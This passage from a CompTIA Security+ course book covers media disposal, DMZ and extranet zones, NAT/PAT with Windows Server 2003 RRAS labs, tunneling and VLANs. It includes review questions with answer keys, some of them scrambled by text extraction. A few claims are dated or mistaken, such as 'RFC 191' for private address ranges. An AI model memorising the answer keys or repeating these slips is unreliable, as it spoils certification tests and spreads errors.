Catastrophic loss
When dealing with the various types of storage media, it is important to try to mitigate the risk of a catastrophic loss of data. The simplest way to do this is to make backup copies of any sensitive information and store the copies in a safe place. Information that is so vital that business operation could be threatened if lost should be stored at a separate, secure location preferably in a fire safe. It is also very important to use a type of media that is less likely to be corrupted or damaged, with solid-state media being the best choice in this instance. Magnetic media is very easily damaged or erased, and optical media is easily scratched and made unreadable.
Encryption
To guarantee that sensitive information does not fall into the wrong hands, any organization should implement a thorough encryption policy. At no time should business-critical information be stored in an unencrypted fashion. All of the media discussed above are compatible with encryption technologies. The key to a successful encryption policy is to educate the entire organization as to the importance of safeguarding sensitive data. If one person takes a floppy disk off-site with unencrypted data, the entire company has been compromised.
1018 CompTIA Security+ Certification Storing and destruction of media

Once data has been transferred to some type of storage media, it is important to have a policy that tracks the content of each disk and where it is located. The medium itself should be well marked with a standardized naming scheme to avoid confusion. As part of the policy, a clear and concise reporting structure should be implemented to account for any missing storage media. All copies should be kept in a secure location until they are no longer needed. Once the data has become obsolete (the timeframe varies by organization), it is necessary to dispose of the media appropriately. This can be done by physically destroying the media, thereby rendering it unreadable, or by merely erasing the data if it is on a medium that is erasable. Note: A crafty hacker need only go through a companys dumpster to likely find all types of data from floppy disks, old tape, even hard disks from servers that are no longer needed or were damaged. Keep in mind that just because a disk drive dies does not mean the data cannot be recovered. A strong policy that ensures the complete destruction of all discarded storage media should be in place and followed. Do it!
B-1:
Discussing storage media

1 The most common size for floppy disks today is:
A
3.5 inches 5.25 inches 8 inches 12 inches
B C D
2 A(n) ___________ detects the changing pattern of reflected light from the bumps in the aluminum coating on a CD. A
B
magnetic field optoelectronic sensor infrared beam disk texture sensor
C D
3 Smart Media is an example of solid-state storage media. True or false?

True
1019
Unit summary: Transmission and storage media

Topic A In this topic, you learned about the various types of transmission media used in network communications. You examined the advantages and disadvantages of each type and learned how to harden the physical layer of the OSI model to protect against intrusion. In this topic, you learned about the various types of storage media used to store data. You identified the characteristics of each medium. Finally, you learned how to properly store data and, when it is no longer usable, destroy it.
Topic B
Review questions
1 Describe coaxial cable construction.
It is composed of a single wire conductor surrounded by an insulating material, which in turn is surrounded by a braided metal shield.
2 Fill in the answers below

RG RG-8 RG-58 RG-59 Ohms 50 50 75 Typically used for Ethernet network LAN backbone Ethernet networks Cable TV and cable modems
3 Describe twisted pair cable.

Individual wires are twisted together to prevent cross talk between pairs and to reduce the effects of EMI and RFI.
4 What is the difference between UTP and STP cable?

STP includes an extra foil shield that is wrapped between the copper pairs to provide additional protection from EMI.
5 Cat 5 twisted pair cables support 1000 Mbps Ethernet. True or False?
False. Cat 5 supports 100 Mbps. Cat 6 supports 1000 Mbps.
6 Fiber optic cable is more susceptible to damage than coax or twisted pair cable. True or False?
True
7 What are the advantages of using fiber optic cable?

Very high bandwidth, EMI immunity, long distances.
8 List potential damage that can be caused by altering data flows on the network.
Data corruption, sabotage of core business plans, impersonation of corporate nodes to gain network access.

9 What is war driving?
Using a laptops wireless network interface card set in promiscuous mode to pick up unsecured wireless signals; usually carried out by driving around with a laptop to locate the signals.
10 List the three major types of storage media.

Magnetic, optical, and solid-state.
11 List examples of storage devices that use a metal oxide coating.

Floppy disks, hard drives, cartridge drives, tape drives.
12 List examples of storage media that use light and reflection to transmit data.
CD-ROM, CD-R, CD-RW, and DVD.
13 What is a potential drawback to allowing users to use flash memory drives?

This can lead to unwanted files being introduced to the computer or network. It can also result in theft of files from the computer or network. Some of these devices are also bootable which can lead to additional security problems such as the introduction of viruses.
14 If one person takes a floppy disk off-site with unencrypted data, the entire company has been compromised. True or False?
True
15 How should data be disposed of?

By physically destroying the media or erasing the data, depending on the level of security required.
1021

An advanced feature of NTFS is the ability to encrypt files and folders. Unlike most encryption programs, NTFS encryption is transparent to the user. This is especially useful for users that are not concerned with learning the details behind the operating system, but who want to create data, encrypt it, and move on. The disadvantage to transparent encryption, however, is that while the users are not bothered by knowing which data is encrypted, they also are not notified about which data is decrypted, opening a potential security hole. After completing this activity, youll be able to encrypt a file on an NTFS partition and remove the encryption by copying the file to a floppy disk. Note: Students should have computers running Windows Server 2003 server with an NTFS partition and a floppy disk inserted into the floppy drive. 1 Using Windows Explorer, navigate to C:\Documents and Settings\Administrator. 2 Right-click the Start Menu folder and choose Properties. 3 Click the Advanced button. 4 Check the Encrypt contents to secure data box. 5 Click OK. 6 Click OK; youll be asked to confirm changes. 7 Verify that the Apply changes to this folder, subfolders and files radio button is selected. 8 Click OK. 9 Right-click Start Menu folder and select Send To, 3 Floppy (A). 10 When prompted about encryption, click Ignore All. 11 Once the files are copied, navigate to the floppy disk drive. 12 Right-click the Start Menu folder and choose Properties. Notice that the Advanced button is no longer available. The files were decrypted.
111
Unit 11 Network security topologies

A Describe security zones and identify their
role in network security.

B Explain the features and configuration of
Network Address Translation (NAT).

C Discuss how tunneling can create a virtual
private network.
D Describe VLANs and explain their
significance as related to network security.
112
Topic A: Security topologies

# 3.3 Objective Understand the concepts behind the following kinds of Security Topologies Security Zones DMZ (Demilitarized Zone) Intranet Extranet
Elements of network topologies

Explanation Security zones, NAT, tunneling, and VLANs are important elements in creating network topologies to secure data and networked resources. Security zonesincluding demilitarized zones (DMZs), extranets and intranetsare put in place using firewalls and routers on the network edge and permit secure communications between the organization and third parties. Network address translation (NAT) masks the source address contained in an IP packet to thwart attackers. Tunneling encrypts and encapsulates network traffic to build a secured connection over a public network. Virtual local area networks (VLANs), which are deployed using network switches, segment different hosts from each other on the network. Each of these technologies will be examined to provide an understanding of the fundamentals of security topologies.
Security zones
Any network that is connected (directly or indirectly) to your organization, but is not controlled by your organization, represents a risk. To alleviate these risks, security professionals create security zones, which divide the network into areas of similar levels of security (trusted, semi-trusted, and untrusted). You create the security zones by putting all your publicly accessed servers in one zone and restricted-access servers in another, then separating both from an external network like the Internet using firewalls. The three main zones into which networks are commonly divided are the intranet, perimeter network, and extranet.
Intranet
The intranet is the organizations private network; this network is fully controlled by the company and is trusted. The intranet typically contains confidential or proprietary information relevant to the company and, consequently, restricts access to internal employees only. The private internal LAN(s) are protected from other security zones by one or more firewalls, which restrict incoming traffic from both the public and DMZ zones.
113
As an additional safeguard to prevent intrusion, intranets use private address spaces. These IP addresses are reserved for private use by any internal network and are not routable on the Internet. The following address ranges are reserved: Class A 10.0.0.0 10.255.255.255 Class B Class C 172.16.0.0 172.31.255.255 192.168.0.0 192.168.255.255
Additional security measures include: Installing anti-virus software Removing unnecessary services from mission-critical servers Auditing the critical systems configurations and resources
DMZ
Demilitarized zones are semi-trusted networks that are owned and controlled by the company, but have a lower level of security than the intranet. (The term comes from the geographic buffer zone that was set up between North Korea and South Korea following the UN police action in the early 1950s.) DMZs are commonly used by companies that want to host their own Internet services, while preventing access to their internal networks. The DMZ is typically a network segment consisting of a combination of firewalls, bastion hosts, and devices accessible to Internet traffic, such as proxy servers, Web (HTTP) servers, FTP servers, SMTP (e-mail) servers, and DNS servers. This zone also serves as a buffer zone between the Internet and intranet. Exhibit 11-1 and Exhibit 11-2 show two sample configurations for the perimeter network. In Exhibit 11-1, the DMZ zone is isolated by two firewalls, one leading to the Internet, the other to the intranet. This configuration protects the Web server with a firewall that allows access to the HTTP for Web services, but restricts all other protocols. A separate firewall is used to isolate the intranet from all Internet traffic. This implementation of the DMZ is called a screened subnet.
Not all organizations require a DMZ, so explain to students that a DMZ is necessary only if a company wishes to host its own public resources such as Web servers and DNS servers. Many organizations host their Web server and other public servers with a third party, thereby avoiding the necessity of a DMZ.
Exhibit 11-1: Three-tiered security topology
114
CompTIA Security+ Certification In Exhibit 11-2, a single firewall with three network interfaces (three-NIC firewall) provides the separation of the intranet, the DMZ and the external network. A single device protects both the perimeter network and the intranet. This network configuration is not as secure as the Exhibit 11-1: a failure or compromise of the three-NIC firewall can result in the compromise of the perimeter network and intranet simultaneously.
Exhibit 11-2: Security zones created by three-NIC firewall Internet users can access only the hosts on the DMZ. In the event that an outside user penetrates the DMZ hosts security, Web pages or FTP files might be corrupted, but no other company information would be exposed. Filter outgoing traffic Filtering traffic originating from a DMZ impairs an attackers ability to have a vulnerable host communicate to the attackers host. An attacker often has the vulnerable DMZ host initiate commands that open an outgoing connection from the DMZ to the attackers host to receive more commands to run. Blocking this initial outbound connection makes life harder for the attacker. Applying filtering to traffic leaving the DMZ can also keep a compromised host from being used as a traffic-generating agent in distributed denial-of-service attacks. Assuming you know that DMZ hosts should not be initiating outbound traffic, you can trigger an intrusion detection alarm to notify you whenever the rule is engaged. Likewise, because you know what traffic should originate on your hosts, you can construct filters that notify you when someone tries to initiate traffic outside of what is expected. This is a key principal in constructing intrusion detection alarms and can be a highly effective method of notifying you when your host has been compromised. The most basic method of limiting outbound traffic is to construct a firewall rule or router filter that specifically drops traffic initiated from devices on the DMZ network interface to the Internet.
Network security topologies Filter incoming traffic
115
Another good candidate for filtering is the traffic coming in from the DMZ interface of the firewall or router that appears to have a source IP address on a network other than the DMZ network number. This traffic generally represents spoofed traffic that is often associated with denial-of-service attacks. When dropping these types of security-related traffic, the firewall or router should be configured to initiate a log message or rule alert so that a notification of a potential system compromise can be sent to an appropriate administrator. A solid understanding of what kind of network traffic is expected to be generated is essential for this kind of configuration to work. The key is to limit traffic to only authorized access. Remember that several common protocols, such as FTP and DNS, initiate outbound connections. Special consideration should be given to these kinds of protocols. Applying these recommendations can make an attackers job much more difficult and provide an administrator early notification when a host has been compromised.
Extranet
The extranet is an extension of your private network or intranet. It allows you to share your business information or operations with another business, such as a supplier, vendor, partner, or customer. This is often referred to as business-to-business (B2B) communications or networks because one company uses the internal resources and services of another. An extranet requires security and privacy. These are accomplished through firewall management, the issuance and use of digital certificates or similar means of user authentication, encryption of messages, and the use of VPNs that tunnel through the public network. Companies can use an extranet to: Exchange large volumes of data using Electronic Data Interchange (EDI). Share product catalogs exclusively with wholesalers or those in the trade. Collaborate with other companies on joint development efforts. Jointly develop and use training programs with other companies. Provide or access services provided by one company to a group of other companies, such as an online banking application managed by one company on behalf of affiliated banks. Share news of common interest exclusively with partner companies.
116
Do it!
A-1:
Understanding security zones

1 How do you create a security zone?
Put all your publicly accessed servers in a DMZ zone and restricted-access servers in an intranet zone, then separate both using a firewall. Use an additional firewall or NIC installed on a firewall to isolate the DMZ from the Internet.
2 A demilitarized zone (DMZ) is used by a company that wants to host its own Internet services while preventing access to its private network. True or false?
True
3 The DMZ is the most insecure area of your network infrastructure. What hardware is reserved for this area? (Choose all that apply.)
A B C D
Print servers Firewalls Public Internet servers, such as HTTP, FTP, and Gopher servers Mail servers
4 How are security and confidentiality maintained on an extranet?

These are accomplished through firewall management, the issuance and use of digital certificates or similar means of user authentication, encryption of messages, and the use of VPNs that tunnel through the public network.
5 List three rules that the DMZ firewall should include.

Answers may include:
Filter traffic originating from a DMZ. Construct filters that notify you when someone tries to initiate traffic outside of what is
expected. Internet.
Specifically drop traffic initiated from devices on the DMZ network interface to the Filter the traffic coming in from the DMZ interface of the firewall or router that appears to
have a source IP address of a network other than the DMZ network number.
Block all ports except for required services.
117
Topic B: Network Address Translation

# 3.3 Objective Understand the concepts behind the following kinds of Security Topologies NAT (Network Address Translation)
NAT
Explanation Network Address Translation (NAT) is a service that allows the conversion of internal private (IP) addresses to Internet public addresses. They are not routable and are not directly accessible from the Internet. NAT was originally developed as an interim solution to tackle IPv4 address depletion by allowing globally registered IP addresses to be reused or shared by several hosts. The classic NAT defined by RFC 1631 maps IP addresses from one realm to another. A more recent definition of NAT is found in RFC 3022. NAT serves two main purposes: It provides a type of firewall by hiding internal IP addresses. It enables a company to use more internal IP addresses. Because theyre only used internally, theres no possibility of conflict with IP addresses used by other companies and organizations. Although it can be used to translate between any two address realms, NAT is most often used to map IPs from the private address spaces defined by RFC 191, as shown here:
Class A B C Private Address Range 10.0.0.0 10.255.255.255 172.16.0.0 172.31.255.255 192.168.0.0 192.168.255.255
These addresses were reserved for use by private networks. Enterprises can freely use these addresses to avoid obtaining registered public addresses. Because private addresses can be reused by other organizations, they are not unique and are nonroutable over a common infrastructure. When communication between a privately addressed host and a public network (such as the Internet) is needed, address translation is required. This is where NAT comes in. NAT routers sit on the border between private and public networks, converting private addresses in each IP packet into legally registered public ones. They also provide transparent packet forwarding between addressing realms. The packet sender and receiver (should) remain unaware that NAT is taking place. Today, NAT is commonly supported by WAN access routers and firewalls situated at the network edge.
118
Static NAT
NAT works by creating bindings between addresses. In the simplest case, a one-to-one mapping might be defined between public and private addresses. Known as static NAT, this can be accomplished by a straightforward, stateless implementation that transforms only the network part of the address, leaving the host part intact. The payload of the packet must also be considered during the translation process. The IP checksum must, of course, be recalculated. Because TCP checksums are computed from a pseudo-header containing source and destination IP address (attached to the TCP payload), NAT must also regenerate the TCP checksum.
Dynamic NAT
More often, a pool of public IP addresses is shared by an entire private IP subnet in a form of NAT called dynamic NAT. Edge devices that run dynamic NAT create bindings on the fly by building a NAT table. Connections initiated by private hosts are assigned a public address from a pool. As long as the private host has an outgoing connection, it can be reached by incoming packets sent to this public address. After the connection is terminated (or a timeout is reached), the binding expires, and the address is returned to the pool for reuse. Dynamic NAT is more complex because state must be maintained, and connections must be rejected when the pool is exhausted. However, unlike static NAT, dynamic NAT enables address reuse, reducing the demand for legally registered public addresses. The potential problem with dynamic NAT (or static NAT for that matter) is that it has fewer public addresses than inside hosts. If you have 254 public addresses, for example (a class C network), you might assign 3 or 4 of those to static devices, like Web servers and DNS servers. That leaves 250 addresses for dynamic NAT. But what if your organization has 500 hosts? If more than 250 want to use the Internet at the same time, you will run out of public addresses. The solution? PAT.
Port Address Translation (PAT)

A variation of dynamic NAT, known as Port Address Translation (PAT), might be used to allow many hosts to share a single IP address by multiplexing streams differentiated by TCP/UDP port numbers. For example, suppose private hosts 192.168.0.2 and 192.168.0.3 both send packets from source port 1108. A PAT router might translate these to a single public IP address 206.245.160.1 and two different source ports, say 61001 and 61002. Response traffic received for port 61001 is routed back to 192.168.0.2:1108, while port 61002 traffic is routed back to 192.168.0.3:1108. PAT is commonly implemented on Small Office/Home Office (SOHO) routers to enable shared Internet access for an entire LAN through a single public address. Because PAT maps individual ports, it is not possible to reverse map incoming connections for other ports unless another table is configured. A virtual server table can make a server on a privately addressed DMZ reachable from the Internet via the public address of the PAT router (one server per port). This is really a limited form of static NAT, applied to incoming requests.
Since a port number is 16 bits long, this has the potential for a single IP address to serve as many as 65,536 different hosts.
119
In some cases, static NAT, dynamic NAT, PAT, and even bi-directional NAT or PAT might be used together. For example, an enterprise might locate public Web servers outside of the firewall on a DMZ, while placing a mail server and clients on the private inside network, behind a NAT firewall. Furthermore, suppose there are applications within the private network that periodically connect to the Internet for long periods. In this case: Web servers can be reached from the Internet without NAT, because they live in public address space. Simple Mail Transfer Protocol (SMTP) sent to the private mail server from the Internet requires incoming translation. Because this server must be continuously accessible through a public address associated with its Domain Name System (DNS) entry, the mail server requires static mapping (either a limited-purpose virtual server table or static NAT). For most clients, public address sharing is usually practical through dynamically acquired addresses (either dynamic NAT with a correctly sized address pool, or PAT). Applications that hold onto dynamically acquired addresses for long periods could exhaust a dynamic NAT address pool and block access by other clients. To prevent this, long-running applications might use PAT because it enables higher concurrency (thousands of port mappings per IP address).

Do it!
B-1:
Discussing Network Address Translation

1 What are the primary functions that NAT performs? (Choose all that apply.)
A B
Provides a type of firewall by hiding internal IP addresses. Enables a company to use more internal IP addresses. Because theyre used internally only, theres no possibility of conflict with IP addresses used by other companies and organizations. Allows a company to combine multiple ISDN connections into a single Internet connection. All of the above.
C D
2 In what class is address range 10.0.0.0 10.255.255.255?

A
A B C D
B C D
3 In what class is address range 192.168.0.0 192.168.255.255? A B

C
A B C D
4 Which of the following protocols map private IP addresses to registered IP addresses on a one-to-one basis? A
B
Dynamic NAT Static NAT Firewall NAT Dynamic PAT
C D
5 Which of the following IP address ranges is reserved for private networks? A B C

D
10.0.0.0 through 10.255.255.255 172.16.0.0 through 172.31.255.255 192.168.0.0 through 192.168.255.255 All of the above
Network security topologies Do it!
1111
B-2:
Configuring RRAS with NAT Heres why

Windows Server 2003 Routing and Remote Access (RRAS) includes a service that can perform network address translation (NAT). In this activity, you will configure the Windows Server 2003 RRAS server for NAT. For this activity, you will need a partner. Each partnership should have two Windows Server 2003 servers (one with two NIC adapters installed), a Windows Server 2003 server CD, Internet access and a crossover cable. Note: The server with two NIC cards will be referred to as Server-X; the other as Server-Y. Substitute the correct server names for these names.
Heres how
For this activity, each student requires a partner. Each pair requires two Windows Server 2003 servers, a Windows Server 2003 server CD, Internet access, and a crossover cable. Important: Students should not connect the crossover cable until instructed to do so.
1 Log on as Administrator on Server-X
2 Click Start Choose Control Panel and right-click Network

Connections
Choose Open 3 Right-click the second network interface Choose Properties 4 Double-click Internet
Protocol (TCP/IP) This card is not connected to the classroom network.
5 Verify that Obtain an IP

address automatically is
If it isnt, select Obtain an IP address automatically.
selected Click OK Click OK 6 Right-click the second network interface Choose Rename 7 Enter Internal as the name Press e
In Network Connections.

8 Right-click the first network interface Rename this card as External 9 Click Start Choose Administrative Tools, Routing and Remote
Access
10 Right-click Server-X 11 Select Configure and Enable

Routing and Remote Access To start the Routing and Remote Access Server Setup Wizard.
12 Click Next 13 Select Network address

translation(NAT)
At the Welcome screen.
Click Next 14 Verify that Use this public

interface to connect to the Internet is selected The External card should be connected to the classroom network and the Internal card should be disconnected for now. If necessary.
Select the External interface in the list of available interfaces 15 Click Next 16 Click Finish 17 Expand Server-X 18 Expand IP Routing 19 Select General 20 Right-click the Internal interface Choose Properties 21 Activate the Configuration tab 22 Select Use the following IP
address
To start the Routing and Remote Access. If necessary (In Routing and Remote Access). If necessary.
Make sure that you only configure the Dedicated interface.
To set static IP addressing on the Internal interface. As the IP address. As the Subnet mask.
Enter 10.10.10.1 Enter 255.0.0.0
Network security topologies 23 Click OK 24 Click OK 25 Close and reopen Routing and
Remote Access To save the changes. To acknowledge the warning message.
1113
(To reopen the MMC console. Click Start, then choose Administrative Tools, Routing and Remote Access.) Under IP Routing. If there are multiple instances of Internal, for this step it doesnt matter which instance you choose.
26 Select NAT/Basic Firewall 27 Right-click Internal
Choose Properties 28 Verify that Private interface

connected to private network is selected
Click OK 29 Right-click the External interface Choose Properties 30 Verify that Public interface
connected to the Internet
is selected Click OK 31 Close Routing and Remote

Access
1114 CompTIA Security+ Certification Configuring a private subnet

Explanation If your network is using DHCP, you need to set static IP addresses for the Internal interface on Server-X and the primary interface on Server-Y. By connecting these two interfaces with a crossover cable, you will create a private subnet. With the NAT server properly configured, you can begin to allow clients to access the Internet.
Do it!
B-3:
Configuring the client for Internet access Heres why

Youll use NAT to configure a client for Internet access. Follow your instructors directions for connecting the cable.
Heres how
a Windows Server 2003 server running RRAS with NAT, a second Windows Server 2003 server to act as a client, Internet access on Server-X, and a crossover cable. Assist students with connecting the crossover cable.
Students will require
1 On Server-Y, disconnect the cable to the classroom network 2 Connect a crossover cable from Server-Y to Server-X 3 Log on to Server-Y as
Administrator
4 Click Start Choose Control Panel and right-click Network

Connections
Choose Open 5 Right-click the network interface Choose Properties 6 Double-click Internet
Protocol (TCP/IP)
7 Select Use the following IP

address
To set static IP addressing.
Enter 10.10.10.2 8 Press t Enter 10.10.10.1 9 Under Use the following

DNS server addresses, enter
As the IP address. (Do not press Enter.) To set the Subnet mask. (As the default gateway.) This is the Internal address for Server-X. As the Preferred DNS server.
the IP address of the training centers DNS server Click OK Click OK
Network security topologies 10 Open Internet Explorer 11 Navigate to your favorite Web site 12 Close Internet Explorer
To access the Internet.
1115
1116 CompTIA Security+ Certification Disabling specific ports

Explanation In some cases, you might want to disable access to specific ports on the NAT server. For example, some companies have had users abuse Internet access by using it for nonjob-related tasks, such as listening to online radio stations. This might seem harmless to the average user, but it can be a nightmare for network engineers. The bandwidth consumption used by the Internet radio stations is very large and can get much worse if they are sending streaming video. Windows Server 2003 with RRAS has the ability to block specific ports to allow network engineers to manage Internet access.
Do it!
B-4:
Filtering outgoing traffic Heres why

To configure NAT output filters and to block Internet access for all users that use NAT.
Heres how
have a Windows Server 2003 server running RRAS and NAT and a second Windows Server 2003 server to act as a client.
Students should
1 On Server-X, click Start Choose Administrative

Tools, Routing and Remote Access
2 Expand IP Routing Select General 3 Right-click the External interface Choose Properties 4 Click Outbound Filters Click New
If necessary.
To open the External Properties dialog box. The General tab is activated by default. To open the Outbound Filters dialog box. To open the Add IP Filter dialog box.
Network security topologies 5 Enter the information shown below

To block all Internet access to port 80.
1117
6 Click OK
To return to the Outbound Filters dialog box. The settings you just entered instruct the router to block all Internet access using the HTTP protocol.
7 Verify that Transmit all

packets except those that meet the criteria below is
selected Click OK twice 8 On Server-Y, launch Internet Explorer and try to access your favorite Web site 9 Close Internet Explorer
Internet Explorer will try to load the page. After a few minutes, youll receive the error message: The page cannot be displayed.
1118 CompTIA Security+ Certification Controlling local FTP access

Explanation FTP is a useful tool for transferring files across the Internet, but it has a major security flaw: it sends usernames and passwords across the LAN in plain text. By using Windows Server 2003 RRAS input and output filters, you can control FTP access without blocking other services. In the following activity, youll block local FTP access but allow Internet FTP access. The reason for doing this is that local FTP traffic is susceptible to sniffing, while most Internet FTP sites use anonymous access, which is not.
Do it!
B-5:
Blocking local FTP access Heres why
Heres how
1 On Server-X, right-click the Internal interface Choose Properties 2 Click Inbound Filters Click New 3 Enter the information shown below
To open the Inbound Filters dialog box.
To block local FTP traffic while still allowing Internet ftp access.
Click OK 4 Verify that Receive all

packets except those that meet the criteria below is
To return to the Inbound Filters dialog box.
selected Click OK 5 Click OK
Network security topologies 6 On Server-Y, click Start Choose Run Enter cmd 7 At the command line, enter ftp
10.10.10.1
1119
To connect to Server-X via ftp. Youll be notified that you are connected to Server-X, but the connection will time out, and youll receive the message: Connection closed by remote host.
8 At the command line, enter the following commands:

ftp open ftp.microsoft.com Enter ftp, and when the ftp prompt is displayed, enter open ftp.microsoft.com. Youll connect successfully and be prompted to log on.
9 Press c + C, then enter quit 10 On Server-X, right-click External interface Choose Properties 11 Click Outbound Filters 12 Click Delete Click OK Click OK 13 Right-click Internal interface Choose Properties 14 Click Inbound Filters 15 Click Delete Click OK Click OK
To exit the ftp site.
To start the process of removing the NAT outbound filters.
To close the Output Filters window. To close the External Properties window. To start the process of removing the NAT inbound filters.
To close the Input Filters window. To close the Internal Properties window.

16 Right-click Server-X Choose Disable Routing and
Remote Access To disable Routing and Remote Access.
Click Yes 17 Remove the crossover cable from Server-Y 18 Reconnect the network cable for Server-Y to the classroom network 19 On Server-Y, access the properties of the network interface Select Obtain an IP address
automatically
To confirm the change.
Select Obtain DNS server

address automatically
20 Click OK twice 21 Close all windows
1121
Topic C: Tunneling
# 3.3 Objective Understand the concepts behind the following kinds of Security Topologies Tunneling
How tunneling works

Explanation A technology that enables a network to securely send its data through an untrusted or shared network infrastructure, tunneling works by encrypting and encapsulating the secured traffic within packets carried by the second network. Virtual private networks are perhaps the best-known example of tunneling technology. Exhibit 11-3 provides an example of a site-to-site (or gateway-to-gateway) tunnel. In this depiction, an organization has two offices and each has an Internet connection. The two offices routinely need to share sensitive data between their LANs. Approaches such as e-mail encryption are usable, but do not provide the convenience or scalability that the organization desires. The ideal solution is a direct secure link between the two LANs that permits the offices to use the same servers.
Exhibit 11-3: Tunneling across a shared infrastructure To solve the problem, a router with Internet Protocol Security (IPSec) encryption capabilities is deployed as a gateway on each LANs Internet connection. The routers are configured for a point-to-point VPN tunnel, which uses encryption to build a virtual connection between the two routers. When a router sees traffic on its LAN that is destined for the other office, it communicates over the Internet to the router on the other side instructing it to build the tunnel. The tunnel is actually an agreement between the two routers on how the data is encrypted. Once the two routers have negotiated a secure encrypted connection, traffic from the originating host is encrypted using the agreed-upon settings and sent to the peer router. The peer router decrypts the data and forwards it to the appropriate host on its LAN. The connection appears to be a tunnel, because the hosts on the two LANs are unaware that their data is being encrypted. The encryption and delivery of the data over the untrusted network happens transparently to the communicating hosts. Because of their low cost (VPN tunnels often use existing Internet connections) and security, tunneling has become common, replacing wide area network (WAN) links such as frame relay connections. Tunneling is an option for most IP connectivity requirements.

Do it!
C-1:
Reviewing VPN tunneling

Make sure that students understand that L2TP and PPTP are tunneling protocols and, unless combined with an encryption protocol such as IPSec or MPPE, do not guarantee confidentiality.
1 Which of the following protocols are used to secure a VPN connection?

A
IPSec L2TP MPPE PPTP
B
C
2 For each of the descriptions below, indicate whether the VPN is a remote access or site-to-site topology. Creates a secured connection between a remote client and an access point or the corporate network Establishes a point-to-point connection Requires an ISP to establish the tunnel Uses tunnel mode encryption Decrypts the entire IP packet before forwarding to the destination host
Remote access
Site-to-site Remote access Site-to-site Site-to-site
1123
Topic D: Virtual Local Area Networks

# 3.3 Objective Understand the concepts behind the following kinds of Security Topologies VLANs (Virtual Local Area Network)
VLANs
Explanation Virtual local area networks (VLANs) are a way of dividing a single physical network switch among multiple network segments or broadcast domains. This ability to configure multiple VLANs on a single switch is a very powerful and useful technology that offers network flexibility, scalability, increased performance, and some security features. VLANs are often coupled with a complimentary technology, called a trunk, which allows switches to share many VLANs over a single physical link. And because VLANs make it easy to segment a network into multiple subnets (which cannot communicate with each other), they increase the need for routers (which enable communications between subnets), and have a number of important security features, such as packet-filtering capabilities. Because of their benefits, VLANs (and by association, trunking) have become extremely widespread. Most enterprise-grade network switches come standard with the ability to define VLANs. However, VLANs do suffer from a number of vulnerabilities, which can be mitigated by following best practices in network design.
How it works
As an example of how VLANs work, well use a Cisco Catalyst 6509 switch belonging to a business with five departments and 220 employees. This type of switch is an enterprise-class switch that can support a line card with 48 Ethernet ports in up to eight of its nine slots. Thats a total of 384 Ethernet ports on a single switch! By configuring several VLANs on the switch, and assigning each port to an appropriate VLAN, the single physical switch is broken up into multiple logical switches. The business in our example can configure a separate VLAN for each department. It doesnt matter to which port a given users computer is connected because the switch can be configured to place the port into any VLAN.

Exhibit 11-4 illustrates a hypothetical switch configuration in which some ports on line card 2 are configured for VLAN 2 and others are configured for VLAN 1. VLAN 1 includes noncontiguous ports on two different line cards. The configuration is up to the system administrator; any port can be configured for any VLAN, regardless of its physical location on the switch. Each VLAN behaves in many senses like a different switch: hosts on VLAN 1 cannot communicate with hosts on VLAN 2 unless a router is connected to both subnets to forward traffic between them. However, the switchs configuration determines what VLANs exist and to which VLAN each port is assigned. Trunking adds even more power to VLANs by allowing switches to forward data from multiple VLANs over a single physical link. In Exhibit 11-5, you see an example in which switch A provides connectivity to users on the fourth, fifth, and sixth floors of an office building. Switch B provides network connectivity to users on the fourth floor. The switch for each floor is in turn connected by a single Ethernet connection to a central switch, switch E.
Exhibit 11-4: Physical VLAN configuration on Cisco Catalyst 6509 Because the connection between each switch is a trunk, packets from any VLAN can pass across it. (The normal VLAN boundaries apply, however. Hosts on different VLANs cannot communicate with each other over trunks.) This enables hosts connected to VLAN 20 on the fourth floor to communicate with hosts on the sixth floor who are also connected to VLAN 20. Without trunking, a separate physical connection for each VLAN would have to be established between each switch and switch E. The switchs built-in intelligence watches packets arriving on a trunk port, automatically determines to which VLAN it belongs, and forwards it to the appropriate port. The result is that the network administrator can place any host in the building on any of his or her networks subnets, on the fly, without any physical recabling. Major trunking protocols include IEEE 802.1q and Ciscos proprietary Inter-Switch Link (ISL).
1125
Exhibit 11-5: Assigning ports to different VLANs
1126 CompTIA Security+ Certification Security features of VLANs

VLANs have a number of security features, many of which are derived from the fact they permit the administrator to divide a single physical device into multiple subnets, which is to say that VLANs allow networks to be segmented, dividing up hosts and their traffic. VLANs can be configured to group together users in the same group or team, regardless of where their computers are physically connected to the network. The users can be spread throughout a building or across a campus network. Any criteria can be used to divide users up, depending on business requirements. For example, accountants working with sensitive financial data might be segmented on a separate VLAN from other users in order to ensure that the accounting information stays confidential. Because they are on different subnets, hosts in the Accounting Department VLAN cannot communicate directly with other hosts, they can only do so with the help of a router. This protects the Accounting Department from many attacks that rely on direct communication between hosts, such as man-in-the-middle, because accountings broadcasts cannot be seen by other departments users. Further, because traffic filtering can be configured on the router connecting VLANs to the corporate network, the network administrator is able to enforce security policies by stopping prohibited communications between department VLANs. Another useful aspect of VLANs pertains to physically inserting attacking devices, such as a sniffer, into the network. If an unauthorized person gains access to the network closet and attempts to connect a sniffer to the network, VLANs could offer some protection. In this situation, the attacker wouldnt know in advance to which VLAN he was connecting (unless he had previous knowledge of the network) because any port could be configured to be in any VLAN. Depending on the attackers objectives (such as sniffing traffic belonging to the Accounting Department), this could foil the attack. Further, adhering to the best practices outlined here increases the difficulty of connecting rogue devices to the network. Protect unused switch ports. Most configurable switches support the ability to turn off ports. Network administrators should be sure to turn off all switch ports that are not in use so that they cannot be used by an attacker to connect an unauthorized device to the network. Administrators can protect their networks from accidentally leaving an unused port on by moving all unused ports to a separate VLAN without any user traffic and without any router connections. That way, if an attacker does find an active port to use, there is no traffic to sniff and no router to permit him to reach other network segments. Use an air gap to separate trusted from untrusted networks. Do not allow the same switch or network of switches to provide connectivity to networks segregated by security devices such as firewalls. A switch that has direct connections to untrusted networks such as the Internet, or semi-trusted networks such as DMZs, should never be used to contain trusted network segments as well. Several attacks can affect the configuration of the switch so that it does not properly segment VLANs.
Vulnerabilities of VLAN trunks

A number of vulnerabilities are associated with VLAN trunks. This is inherent in their function of carrying traffic from multiple subnets across a single physical connection. One could imagine that if it is desirable to prevent hosts in two different departments (say, Accounting and Marketing) from communicating with each other, that there might be issues with mixing their traffic over a trunk.
Network security topologies Trunk auto-negotiation
1127
